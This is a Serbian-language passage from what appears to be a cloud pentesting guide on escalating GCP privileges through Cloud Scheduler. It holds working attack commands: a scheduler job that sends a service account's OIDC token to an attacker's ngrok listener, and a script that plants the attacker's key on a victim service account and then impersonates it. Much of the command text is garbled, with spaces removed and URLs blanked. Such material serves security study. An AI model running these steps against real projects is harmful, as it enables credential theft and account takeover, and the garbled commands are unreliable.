Napadač sa ovim dozvolama mogao bi da iskoristi Cloud Scheduler da autentifikuje cron poslove kao određeni Service Account. Kreiranjem HTTP POST zahteva, napadač zakazuje akcije, poput kreiranja Storage bucket-a, da se izvrše pod identitetom Service Account-a. Ova metoda koristi Scheduler-ovu sposobnost da cilja * krajnje tačke i autentifikuje zahteve, omogućavajući napadaču da direktno manipuliše Google API krajnjim tačkama koristeći jednostavnu gcloud komandu.
Kontaktirajte bilo koji google API putem sa OAuth token header-om
Da bi eskalirao privilegije, napadač jednostavno kreira HTTP zahtev koji cilja željeni API, imitujući određeni servisni nalog
Ekstraktuj OIDC token servisnog naloga
gcloudschedulerjobscreatehttptest--schedule='* * * * *'--uri='' [--oidc-token-audience '...']# Listen in the ngrok address to get the OIDC token in clear text.
Ako treba da proverite HTTP odgovor, možete jednostavno pogledati logove izvršenja.
Kao u prethodnom scenariju, moguće je ažurirati već kreirani scheduler da biste ukrali token ili izvršili akcije. Na primer:
gcloudschedulerjobsupdatehttptest--schedule='* * * * *'--uri='' [--oidc-token-audience '...']# Listen in the ngrok address to get the OIDC token in clear text.
Još jedan primer za otpremanje privatnog ključa na SA i njegovu imitaciju:
# Generate local private keyopensslreq-x509-nodes-newkeyrsa:2048-days365 \-keyout /tmp/private_key.pem \-out /tmp/public_key.pem \-subj "/CN=unused"# Remove last new line character of the public keyfile_size=$(wc-c</tmp/public_key.pem)new_size=$((file_size-1))truncate-s $new_size /tmp/public_key.pem# Update scheduler to upload the key to a SA## For macOS: REMOVE THE `-w 0` FROM THE BASE64 COMMANDgcloudschedulerjobsupdatehttpscheduler_lab_1 \--schedule='* * * * *' \--uri="$PROJECT_ID/serviceAccounts/victim@$" \--message-body="{\"publicKeyData\": \"$(cat/tmp/public_key.pem|base64-w0)\"}" \--update-headers "Content-Type=application/json" \--location us-central1 \--oauth-service-account-email privileged@$ Wait 1 minsleep60# Check the logs to check it workedgcloudloggingread'resource.type="cloud_scheduler_job" AND resource.labels.job_id="scheduler_lab_1" AND resource.labels.location="us-central1"jsonPayload.@type=""'--limit10--project<project-id>--format=json## If any '"status": 200' it means it worked!## Note that this scheduler will be executed every minute and after a key has been created, all the other attempts to submit the same key will throw a: "status": 400# Build the json to contact the SA## Get privatekey in json formatfile_content=$(<"/tmp/private_key.pem")private_key_json=$(jq-Rn--argstr"$file_content"'$str')## Get ID of the generated keygcloudiamservice-accountskeyslist--iam-account=victim@$ Create the json in a file## NOTE that you need to export your project-id in the env var PROJECT_ID## and that this script is expecting the key ID to be the first one (check the `head`)export>/tmp/lab.json<<EOF{"type": "service_account","project_id": "$PROJECT_ID","private_key_id": "$(gcloud iam service-accounts keys list --iam-account=scheduler-lab-1-target@$ |cut -d " " -f 1|grep -v KEY_ID |head -n 1)","private_key": $private_key_json,"client_email": "scheduler-lab-1-target@$","client_id": "$(gcloud iam service-accounts describe scheduler-lab-1-target@$ |grep oauth2ClientId |cut -d "'" -f 2)","auth_uri": "","token_uri": "","auth_provider_x509_cert_url": "","client_x509_cert_url": "$","universe_domain": ""}EOF# Activate the generated keygcloudauthactivate-service-account--key-file=/tmp/lab.json